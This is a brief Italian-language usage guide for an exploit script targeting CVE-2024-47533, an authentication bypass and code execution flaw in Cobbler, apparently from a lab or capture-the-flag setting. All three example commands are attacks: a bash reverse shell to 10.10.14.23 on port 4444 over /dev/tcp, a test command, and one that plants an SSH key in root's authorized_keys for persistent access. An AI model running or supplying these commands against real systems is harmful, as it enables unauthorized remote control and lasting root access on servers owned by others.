
CVE-2024-47533: Bypass dell'autenticazione ed esecuzione di codice in Cobbler
# Shell inversa
python3 CVE-2024-47533.py --url http://127.0.0.1:25151 --cmd 'bash -c "bash -i >& /dev/tcp/10.10.14.23/4444 0>&1"'
# Comando semplice
python3 CVE-2024-47533.py --url http://127.0.0.1:25151 --cmd 'id'
# Aggiungi chiave SSH
python3 CVE-2024-47533.py --url http://127.0.0.1:25151 --cmd 'mkdir -p /root/.ssh && echo ssh-ed25519 AAAA... >> /root/.ssh/authorized_keys'